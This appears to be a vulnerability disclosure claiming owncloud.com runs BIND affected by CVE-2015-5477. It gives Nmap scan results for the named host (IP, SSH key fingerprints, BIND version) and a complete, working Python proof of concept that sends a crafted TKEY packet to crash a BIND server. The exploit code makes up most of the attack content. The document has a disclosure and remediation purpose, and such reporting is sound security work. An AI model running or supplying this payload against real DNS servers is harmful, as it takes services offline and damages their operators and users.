owncloud.com: CVE-2015-5477 BIND9 TKEY Vulnerability + Exploit (Denial of Service)

owncloud.com appears to be vulnerable to CVE-2015-5477 based on the running version of BIND. This allows attackers to launch Denial of Service attacks against owncloud.com which would result in the owncloud server to stop responding and even reboot. It is recommended to upgrade to the latest version of ISC Bind. NMap Scan Results: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-15 14:37 EDT Warning: 50.30.33.235 giving up on port because retransmission cap hit (6). Nmap scan report for owncloud.com (50.30.33.235) Host is up (0.041s latency). rDNS record for 50.30.33.235: www.owncloud.com Not shown: 993 closed ports, 3 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.8 (protocol 2.0) | ssh-hostkey: | 1024 96:ad:80:e0:cb:33:02:47:67:6b:1c:f1:29:7e:e7:c6 (DSA) | 1024 68:ee:34:57:52:e5:fe:7b:7b:32:86:d9:99:57:08:73 (RSA) |_ 256 fb:b8:b5:5b:7a:b2:46:61:f2:87:e7:2b:0d:c7:bc:2d (ECDSA) 53/tcp open domain | dns-nsid: |_ bind.version: 9.9.4-rpz2.13269.14-P2 Exploit PoC: # Exploit Title: PoC for BIND9 TKEY DoS # Exploit Author: elceef # Software Link: https://github.com/elceef/tkeypoc/ # Version: ISC BIND 9 # Tested on: multiple # CVE : CVE-2015-5477 #!/usr/bin/env python import socket import sys print('CVE-2015-5477 BIND9 TKEY PoC') if len(sys.argv) < 2: print('Usage: ' + sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + sys.argv[1] + ' ...') payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (sys.argv[1], 53)) print('Done.') CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477